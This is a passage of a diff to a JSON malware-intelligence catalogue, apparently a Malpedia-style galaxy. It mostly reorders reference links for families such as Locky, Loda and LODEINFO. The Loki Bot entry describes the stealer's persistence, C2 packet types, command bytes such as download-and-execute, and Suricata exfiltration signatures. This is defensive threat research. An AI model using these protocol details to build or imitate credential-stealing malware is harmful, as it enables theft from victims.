"https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://vixra.org/pdf/2002.0183v1.pdf", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/" + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html", + "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/" ], "synonyms": [], "type": [] @@ -31590,8 +33101,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/", - "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", - "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html" + "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", + "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/" ], "synonyms": [], "type": [] @@ -31600,20 +33111,20 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", - "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html", - "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html", - "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", - "https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", - "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/", + "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html", + "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/", - "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/" + "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", + "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/", + "https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered", + "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html" ], "synonyms": [ "LodaRAT", @@ -31629,18 +33140,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo", - "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html", - "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/", + "https://twitter.com/jpcert_ac/status/1351355443730255872", + "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html", "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", - "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", - "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html", - "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html", - "https://twitter.com/jpcert_ac/status/1351355443730255872", - "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html", - "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/" + "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/", + "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html", + "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html", + "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html" ], "synonyms": [], "type": [] @@ -31666,8 +33177,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", - "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md" + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md", + "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" ], "synonyms": [], "type": [] @@ -31680,9 +33191,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu", - "https://news.drweb.ru/show/?i=14177", "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf" + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf", + "https://news.drweb.ru/show/?i=14177" ], "synonyms": [], "type": [] @@ -31695,12 +33206,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", - "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://habr.com/ru/amp/post/668154/", "https://www.youtube.com/watch?v=VeoXT0nEcFU", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/" + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" ], "synonyms": [], "type": [] @@ -31713,9 +33224,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokilocker", + "https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/", "https://www.theregister.com/2022/03/16/blackberry_lokilocker_ransomware/", "https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware", - "https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/" + "https://asec.ahnlab.com/en/52570/" ], "synonyms": [], "type": [] @@ -31724,65 +33236,66 @@ "value": "LokiLocker" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", - "https://github.com/R3MRUM/loki-parse", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "https://lab52.io/blog/a-twisted-malware-infection-chain/", - "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot", - "http://reversing.fun/reversing/2021/06/08/lokibot.html", - "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.youtube.com/watch?v=-FxyzuRv6Wg", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", - "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/", - "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html", - "https://www.youtube.com/watch?v=N0wAh26wShE", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.youtube.com/watch?v=K3Yxu_9OUxU", - "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/", "https://ivanvza.github.io/posts/lokibot_analysis", - "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", - "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", - "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + "https://malcat.fr/blog/statically-unpacking-a-simple-net-dropper/", "https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-deep-analysis-of-a-recent-lokibot-attack.pdf", - "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", - "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "http://reversing.fun/posts/2021/06/08/lokibot.html", - "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/", - "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", - "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html", - "https://phishme.com/loki-bot-malware/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.youtube.com/watch?v=-FxyzuRv6Wg", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations", + "https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", + "https://malcat.fr/blog/reversing-a-nsis-dropper-using-quick-and-dirty-shellcode-emulation/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://www.youtube.com/watch?v=N0wAh26wShE", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", + "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "http://reversing.fun/posts/2021/06/08/lokibot.html", + "https://isc.sans.edu/diary/24372", + "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html", + "https://github.com/R3MRUM/loki-parse", + "http://reversing.fun/reversing/2021/06/08/lokibot.html", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/spammed-png-file-hides-lokibot/", + "https://cybergeeks.tech/how-to-expose-a-potential-cybercriminal-due-to-misconfigurations/", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", + "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.atomicmatryoshka.com/post/malware-headliners-lokibot", "https://isc.sans.edu/diary/27282", - "https://isc.sans.edu/diary/24372" + "https://phishme.com/loki-bot-malware/", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/" ], "synonyms": [ "Burkina", @@ -31813,10 +33326,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062", "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062", - "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63" ], "synonyms": [], @@ -31830,8 +33343,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch", - "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] @@ -31840,14 +33353,10 @@ "value": "LONGWATCH" }, { - "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", + "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper", - "https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool", - "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/", - "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/", - "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper" ], "synonyms": [], "type": [] @@ -31860,16 +33369,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback", - "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", - "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html", - "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage" + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/" ], "synonyms": [], "type": [] @@ -31882,11 